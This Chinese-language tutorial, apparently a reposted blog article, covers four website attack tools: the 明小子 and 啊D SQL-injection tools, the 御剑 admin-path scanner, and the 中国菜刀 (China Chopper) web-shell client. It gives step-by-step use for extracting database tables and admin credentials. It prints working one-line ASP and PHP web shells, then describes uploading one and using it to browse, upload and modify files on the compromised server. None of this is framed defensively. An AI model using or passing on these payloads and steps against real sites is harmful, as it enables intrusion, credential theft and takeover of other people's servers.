明小子注入工具+啊D注入工具+御剑后台扫描工具+中国菜刀一句话木马
明小子:
明小子主要功能為“SQL注入猜解”,手工猜測太過繁瑣,使用明小子可以檢測是否存在注入點,猜解表名,列名和字段數據(用戶名和密碼)
使用:
1.單擊工具中的“SQL注入猜解”,輸入網站地址,檢測是否存在注入點。
2.點擊“猜解表名”,猜出數據庫表名
3.選定猜解出的表名,猜解表中字段名和字段值
4.猜解后臺地址,使用猜到的用戶名和密碼進行登陸
啊D注入工具:
1、掃描注入點
使用啊D對網站進行掃描,輸入網址就行
2、SQL注入檢測
檢測已知可以注入的鏈接
3、管理入口檢測
檢測網站登陸的入口點,如果已經得到用戶名和密碼的話,可以用這個掃描一下,看能否找到后臺進行登陸
4、瀏覽網頁
可以用這個瀏覽網頁,如果遇到網頁中存在可以注入的鏈接將提示
御劍:
御劍后臺掃描枚舉可能的后臺路徑 找到后臺看是啥系統可以爆庫或者利用漏洞進后臺就簡單多了
1.輸入目標站點的url,點擊掃描
2.掃描結果分析:HTTP響應值為200,代表頁面可以訪問
雙擊鏈接http://../index.asp,進入目標站點主頁
雙擊鏈接http://../admin/login.asp, 進入后臺管理頁面 ?(掃描網站登錄后臺)
雙擊鏈接http://../FCKeditor/admin_login.html,該站點的編輯器類型為FCK以及版本號 ?(掃描編輯器登錄后臺)
中國菜刀:
下載地址:http://www.onlinedown.net/soft/588101.htm
1.中國菜刀支持的服務端腳本:PHP、ASP,主要用于連接一句話木馬。
2.主要功能有:文件管理(有足夠的權限時候可以管理整個磁盤/文件系統),數據庫管理,虛擬終端。
常用的一句話木馬:
asp的一句話是:<%eval request("lubr")%>
php的一句話是:<?php @eval($_POST['lubr']);?>
使用:
1.上傳一句話木馬,記錄木馬地址,例如http://192.168.1.3:8080/up/images/lubr.php
2.菜刀連接:
進入中國菜刀目錄,點擊chopper.exe
右鍵點擊添加,在地址欄中添加上傳文件路徑,右側添加密碼lubr, 腳本類型選擇PHP
右鍵點擊文件管理,查看目標服務器的完整目錄,可進行創建文件,修改文件,上傳下載等操作,如上傳大馬。
總結
以上是生活随笔為你收集整理的明小子注入工具+啊D注入工具+御剑后台扫描工具+中国菜刀一句话木马的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 深入理解C语言指针
- 下一篇: 利用android studio制作简单